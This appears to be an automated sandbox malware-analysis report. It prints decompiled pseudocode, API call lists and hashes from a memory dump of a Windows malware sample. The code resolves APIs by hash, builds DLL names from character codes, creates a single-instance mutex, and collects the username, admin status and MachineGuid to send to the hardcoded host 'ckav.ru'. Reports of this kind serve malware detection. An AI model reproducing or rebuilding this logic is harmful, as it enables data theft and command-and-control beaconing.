                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: File$AllocCreateReadVirtual
                                              • String ID: .tmp
                                              • API String ID: 3585551309-2986845003
                                              • Opcode ID: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                                              • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                              • Opcode Fuzzy Hash: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                                              • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00413866, Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 79%
                                              			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}































































                                              0x0041386f
                                              0x0041387e
                                              0x00413885
                                              0x00413889
                                              0x0041388c
                                              0x00413890
                                              0x00413893
                                              0x00413897
                                              0x0041389a
                                              0x0041389e
                                              0x004138a1
                                              0x004138a5
                                              0x004138a8
                                              0x004138ac
                                              0x004138af
                                              0x004138b2
                                              0x004138b5
                                              0x004138b8
                                              0x004138bb
                                              0x004138bc
                                              0x004138c4
                                              0x004138c8
                                              0x004138cb
                                              0x004138cf
                                              0x004138d2
                                              0x004138d6
                                              0x004138d7
                                              0x004138df
                                              0x004138e3
                                              0x004138e4
                                              0x004138ea
                                              0x004138eb
                                              0x004138f1
                                              0x004138f5
                                              0x004138f9
                                              0x004138fd
                                              0x00413901
                                              0x00413905
                                              0x00413909
                                              0x0041390d
                                              0x00413911
                                              0x00413915
                                              0x00413919
                                              0x0041391d
                                              0x00413921
                                              0x00413925
                                              0x00413929
                                              0x0041392d
                                              0x00413931
                                              0x00413935
                                              0x00413939
                                              0x0041393d
                                              0x00413941
                                              0x00413950
                                              0x00413959
                                              0x0041395f
                                              0x00413968
                                              0x0041396e
                                              0x00413973
                                              0x00413977
                                              0x00413979
                                              0x00413980
                                              0x00413982
                                              0x00413991
                                              0x0041399c
                                              0x0041399e
                                              0x004139a4
                                              0x004139a9
                                              0x004139ac
                                              0x004139b1
                                              0x004139b1
                                              0x004139b2
                                              0x004139b7
                                              0x004139bc
                                              0x004139c1
                                              0x004139c7
                                              0x004139cd
                                              0x004139cd
                                              0x004139db

                                              APIs
                                              • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                              • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                              • GetLastError.KERNEL32 ref: 0041399E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Error$CreateLastModeMutex
                                              • String ID:
                                              • API String ID: 3448925889-0
                                              • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                              • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                              • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                              • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004042CF, Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}








                                              0x004042cf
                                              0x004042d5
                                              0x004042df
                                              0x004042e2
                                              0x004042f9
                                              0x004042fb
                                              0x00404300
                                              0x0040430a
                                              0x00404314
                                              0x00404319
                                              0x00404323
                                              0x00404334
                                              0x0040433b
                                              0x0040433b
                                              0x0040433f
                                              0x00404344
                                              0x0040434c

                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                              • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: File$CreatePointerWrite
                                              • String ID:
                                              • API String ID: 3672724799-0
                                              • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                              • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                              • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                              • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00412D31, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 34%
                                              			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10;
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}






























                                              0x00412d31
                                              0x00412d34
                                              0x00412d39
                                              0x00412d3c
                                              0x00412d49
                                              0x00412d50
                                              0x00412d52
                                              0x00412f24
                                              0x00412f24
                                              0x00412f2b
                                              0x00412f30
                                              0x00412f32
                                              0x00412f37
                                              0x00412f41
                                              0x00412f53
                                              0x00412f53
                                              0x00412f5b
                                              0x00412f60
                                              0x00412d58
                                              0x00412d58
                                              0x00412d63
                                              0x00412d6c
                                              0x00412d73
                                              0x00412d7e
                                              0x00412d7f
                                              0x00412d80
                                              0x00412d81
                                              0x00412d82
                                              0x00412d8f
                                              0x00412da1
                                              0x00412da6
                                              0x00412dae
                                              0x00412db0
                                              0x00412db1
                                              0x00412db5
                                              0x00412dce
                                              0x00412dcf
                                              0x00412dd5
                                              0x00412dda
                                              0x00412db7
                                              0x00412db7
                                              0x00412db8
                                              0x00412dbe
                                              0x00412dc4
                                              0x00412dc9
                                              0x00412dc9
                                              0x00412de2
                                              0x00412de4
                                              0x00412de5
                                              0x00412de7
                                              0x00412de9
                                              0x00412e02
                                              0x00412e03
                                              0x00412e09
                                              0x00412e0e
                                              0x00412deb
                                              0x00412deb
                                              0x00412dec
                                              0x00412df2
                                              0x00412df8
                                              0x00412dfd
                                              0x00412dfd
                                              0x00412e11
                                              0x00412e17
                                              0x00412e19
                                              0x00412e1a
                                              0x00412e1e
                                              0x00412e37
                                              0x00412e38
                                              0x00412e3e
                                              0x00412e43
                                              0x00412e20
                                              0x00412e20
                                              0x00412e21
                                              0x00412e27
                                              0x00412e2d
                                              0x00412e32
                                              0x00412e32
                                              0x00412e4b
                                              0x00412e4d
                                              0x00412e4f
                                              0x00412e7e
                                              0x00412e8a
                                              0x00412e8f
                                              0x00412e51
                                              0x00412e59
                                              0x00412e67
                                              0x00412e6d
                                              0x00412e72
                                              0x00412e72
                                              0x00412e9e
                                              0x00412eaf
                                              0x00412eb4
                                              0x00412ec0
                                              0x00412ece
                                              0x00412edc
                                              0x00412eea
                                              0x00412ef8
                                              0x00412f0f
                                              0x00412f14
                                              0x00412f14
                                              0x00412f17
                                              0x00412f1d
                                              0x00412f1f
                                              0x00000000
                                              0x00412f1f
                                              0x00412f74

                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                                • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                                • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                • Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$CreateFreeProcessThread_wmemset
                                              • String ID: ckav.ru
                                              • API String ID: 2915393847-2696028687
                                              • Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                                              • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                              • Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                                              • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040632F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}







                                              0x00406340
                                              0x00406345
                                              0x00406373
                                              0x00406373
                                              0x00406347
                                              0x0040634f
                                              0x00406354
                                              0x00406357
                                              0x0040635c
                                              0x00406366
                                              0x0040636d
                                              0x00000000
                                              0x00406368
                                              0x00406368
                                              0x00406368
                                              0x00406366
                                              0x0040637a

                                              APIs
                                                • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                              • _wmemset.LIBCMT ref: 0040634F
                                                • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateNameProcessUser_wmemset
                                              • String ID: CA
                                              • API String ID: 2078537776-1052703068
                                              • Opcode ID: f2258d9b8330d324457b64b56ec83946477e708dba813dda8b6774b529cb1dca
                                              • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                              • Opcode Fuzzy Hash: f2258d9b8330d324457b64b56ec83946477e708dba813dda8b6774b529cb1dca
                                              • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00406086, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}





                                              0x00406094
                                              0x004060a8
                                              0x004060ab

                                              APIs
                                              • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: InformationToken
                                              • String ID: IDA
                                              • API String ID: 4114910276-365204570
                                              • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                              • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                              • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                              • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00402C03, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}





                                              0x00402c10
                                              0x00402c15
                                              0x00402c1b
                                              0x00402c1e

                                              APIs
                                              • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc
                                              • String ID: s1@
                                              • API String ID: 190572456-427247929
                                              • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                              • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                              • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                              • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00404A52, Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}









                                              0x00404a56
                                              0x00404a65
                                              0x00404a6a
                                              0x00404ad1
                                              0x00404ad1
                                              0x00404a6c
                                              0x00404a71
                                              0x00404a79
                                              0x00404a85
                                              0x00404a9a
                                              0x00404a9e
                                              0x00404acb
                                              0x00000000
                                              0x00404aa0
                                              0x00404aac
                                              0x00404abc
                                              0x00404ac1
                                              0x00404ac6
                                              0x00404ac6
                                              0x00404a9e
                                              0x00404ad9

                                              APIs
                                                • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                              • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                              • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 1425999871-0
                                              • Opcode ID: 8a65b5e102e28de28ef59c05438bd133f995ad554f34eb9b6244912b3c07c856
                                              • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                              • Opcode Fuzzy Hash: 8a65b5e102e28de28ef59c05438bd133f995ad554f34eb9b6244912b3c07c856
                                              • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00402BAB, Relevance: 3.0, APIs: 2, Instructions: 11memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00402BAB(void* _a4) {
				void* _t3;
				char _t5;

				if(_a4 != 0) {
					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
					return _t5;
				}
				return _t3;
			}





                                              0x00402bb2
                                              0x00402bc0
                                              0x00000000
                                              0x00402bc0
                                              0x00402bc7

                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                              • RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$FreeProcess
                                              • String ID:
                                              • API String ID: 3859560861-0
                                              • Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                                              • Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
                                              • Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                                              • Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004060BD, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 40%
                                              			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}













                                              0x004060c6
                                              0x004060d5
                                              0x004060d8
                                              0x004060f4
                                              0x004060f6
                                              0x004060fb
                                              0x0040610a
                                              0x00406115
                                              0x0040611c
                                              0x0040611e
                                              0x00406121
                                              0x00000000
                                              0x0040612a
                                              0x0040612f

                                              APIs
                                              • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CheckMembershipToken
                                              • String ID:
                                              • API String ID: 1351025785-0
                                              • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                              • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                              • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                              • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00403C62, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}





                                              0x00403c68
                                              0x00403c70
                                              0x00403c78
                                              0x00403c82
                                              0x00403c8b
                                              0x00403c8f
                                              0x00403c72
                                              0x00403c76
                                              0x00403c76

                                              APIs
                                              • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CreateDirectory
                                              • String ID:
                                              • API String ID: 4241100979-0
                                              • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                              • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                              • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
